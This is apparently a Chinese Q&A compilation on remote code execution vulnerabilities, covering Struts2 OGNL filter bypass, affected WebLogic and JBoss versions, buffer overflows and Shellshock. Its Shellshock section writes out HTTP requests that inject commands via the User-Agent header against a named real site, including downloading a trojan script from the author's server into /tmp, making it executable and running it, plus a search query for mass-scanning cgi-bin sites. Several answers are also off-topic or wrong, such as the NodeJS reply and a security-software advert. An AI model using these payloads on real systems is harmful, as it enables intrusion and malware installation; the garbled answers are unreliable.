远程命令执行漏洞

1. java远程代码执行漏洞

struts2会将http的每个参数名解析为ongl语句执行(可理解为Java代码)。 ongl表达式通过#来访问struts的对象，struts框架通过过滤#字符防止安全问题，然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制。

2. java反序列化远程命令执行漏洞怎么检测

可以参考这篇文章：http://www.freebuf.com/vuls/86566.html

本人虽然也有一定的研究，但不深入就不献丑解说了。

可供下已发现的一些影响版本：

weblogic：
- 9.2.3.0
- 9.2.4.0
- 10.0.0.0
- 10.0.1.0
- 10.0.2.0
- 10.2.6.0
- 10.3.0.0
- 10.3.1.0
- 10.3.2.0
- 10.3.4.0
- 10.3.5.0
- 12.1.1.0

JBOSS:

JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0

此外还有 WebSphere，Jenkins 和 OpenNMS等，凡是使用了commons-collections.jar包的都会收到影响，此漏洞算是继STRUTS2漏洞，心脏滴血漏洞后的一个重量级漏洞，建议尽快修补

3. 远程代码执行漏洞的意思难道是有人在监控我的电脑吗谢谢

首先，这是一个提示，说你的电脑存有此漏洞，此漏洞可能会被远程控制，是可能被控制，如果你觉得不安全，可以修复此漏洞，但漏洞部署越多越好，杀毒软件一般都会提示的，希望能帮助你理解，呵呵

4. 什么是本地提权漏洞和远程代码执行漏洞

这都是缓冲区溢出攻击，是由于程序代码的漏洞引起得，缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的数据覆盖在合法数据上,理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患.
如ms08004就是远程执行漏洞，ms就是microsoft，08年4日的补丁，黑客通过快速的反汇编手段，知道漏洞的地方，然后制作针对的工具，用来抓肉鸡。通常方法有挂马个扫鸡。
而本地溢出攻击一般用在入侵服务器中的提权，也就是本地提升服务器权限。如ms08025，就可以通过黑客精心构造的代码，执行cmd命令，添加超级管理员！

5. windows远程桌面远程代码执行漏洞怎么产生的

可能是你把端口打开了，选择我的电脑》属性》远程》把第二个选项框的勾去掉就可以了

6. 远程代码执行漏洞的漏洞原理

由于开发人员编写源码，没有针对代码中可执行的特殊函数入口做过滤，导致客户端可以提交恶意构造语句提交，并交由服务器端执行。命令注入攻击中WEB服务器没有过滤类似system(),eval()，exec()等函数是该漏洞攻击成功的最主要原因。

7. 如何使用NodeJS写出一枚远程命令执行漏洞

当我们写了个NodeJS程序的时候，一般用node yourjsfile.js命令启动该程序。但是如果程序中有东西出错，这个进程就会退出。我们写程序不可能保证万无一失，肯定有些没有处理的错误，这就让很多人觉得NodeJS不稳定，容易产生很多故障。

8. 网站url远程命令执行漏洞怎么解决

打开腾讯电脑管家——工具箱——修复漏洞，进行漏洞扫描和修复。
管家可以自动修复漏洞：第一时间发现并修复系统存在的高危漏洞，在不打扰您的情况下自动为系统打上漏洞补丁，轻轻松松将病毒木马拒之门外。自动修复漏洞 电脑管家可以在发现高危漏洞（仅包括高危漏洞，不包括其它漏洞）时，第一时间自动进行修复，无需用户参与，最大程度保证用户电脑安全

9. 远程代码执行漏洞是什么意思

简而言之，就是攻击者可以利用这个漏洞对你上网进行攻击，使你执行一些非预期的指令，甚至得到你的系统控制权。希望可以帮到你。

10. bash远程命令执行漏洞 怎么修复

从昨天开始，这个从澳大利亚远渡重洋而来的BASH远程命令执行漏洞就沸腾了整个FreeBuf，大家都在谈论，“互联网的心脏又出血了”，可是，亲，到底怎么对网站进行测试？下面这段脚本
$ env x=‘() { :;}; echo vulnerable' bash -c "echo this is a test"

真的如各路大神们说的这样吗？
它与“心脏出血”漏洞不同，“心脏出血”只能借助窃取用户电脑信息，而bash 漏洞允许黑客远程控制电脑，拿到系统最高权限！其方法利用就更简单了——复制/粘贴一行命令代码即可！

Bash漏洞为什么能够执行

Bash漏洞的原理：
BASH除了可以将shell变量导出为环境变量，还可以将shell函数导出为环境变量！当前版本的bash通过以函数名作为环境变量名，以“（）{”开头的字串作为环境变量的值来将函数定义导出为环境变量。
此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候，并没有以函数结尾“}”为结束，而是一直执行其后的shell命令。

简单地说就是，Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令。
Bash漏洞与远程执行有啥联系
看到上面的解释，很多童鞋都理解成了本地的漏洞，然后很多人又觉得，本地有啥可以利用的，于是就忽略了这个神级漏洞的存在。我想说的是，这个漏洞，利用热度可以媲美当年的MS08-067，威力虽然弱了点，但远程控制电脑还是可以的。
首先解释一下cgi脚本。很多网站类似下面的链接：
GET http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20HTTP/1.1

后台不仅仅用python、Perl来解释执行并反馈给客户端Response，当然还可以换做bash脚本来解释执行提交上来的GET/POST请求。所以，理论上，你在HTTP请求中插入一个Bash命令，比如
() { :;}; wget http://www.myvps.org/testvul.sh

如果服务器的Bash解释器具有这个漏洞，那么在解释上面这这句话的时候就会执行wget请求，将一个恶意的testvul.sh文件下载到这个服务器，那为何说要放在HTTP头部呢？比如：
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Referer: http://www..com
Connection: keep-alive

这是因为这个漏洞是bash解释器在解释某些特殊的变量时才可以触发的：
在于BASH处理以“（）{”开头的“函数环境变量”的时候，并没有以函数结尾“}”为结束，而是一直执行其后的shell命令
通过自定义这些参数的值为“函数环境变量”的形式，就可以触发后面的命令，恶意的客户仅需要发送特殊构造的HTTP请求就可以使服务器执行特定的命令（命令的权限和解释HTTP请求的Bash脚本环境相同）。
实际测试中，我的构造的测试请求：
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www..com
Connection: keep-alive

过程是这样的：
我发送GET请求–>目标服务器cgi路径
目标服务器解析这个get请求，碰到UserAgent后面的参数，Bash解释器就执行了后面的命令
目标服务器wget–>我的myvps.org
我的vps记录下这个访问的IP地址
然后查看我的myvps.org服务器的访问记录，就可以确定目标有没有去访问，如果访问了，那么，很好，它是有漏洞的。下面是我的VPS接收到的wget请求访问的日志：

大神是这样测试漏洞的

当然，你也可以这样构造：
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget -O /tmp/muma.sh ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh
Accept: */*
Referer: http://www..com
Connection: keep-alive

实际上执行了下面三句：
/usr/bin/wget -O /tmp/muma.sh http://myvps.org/muma.sh ;
chmod 777 /tmp/muma.sh;
./tmp/muma.sh

你会发现，脚本就执行了，这就是Bash漏洞利用测试的精髓。
当然，你可以利用批量Google搜索：
filetype:cgi inurl:cgi-bin site:jp
然后批量提交类似的GET请求，你就能做到批量测试了。测试表明，500个url里有6-8个有bash漏洞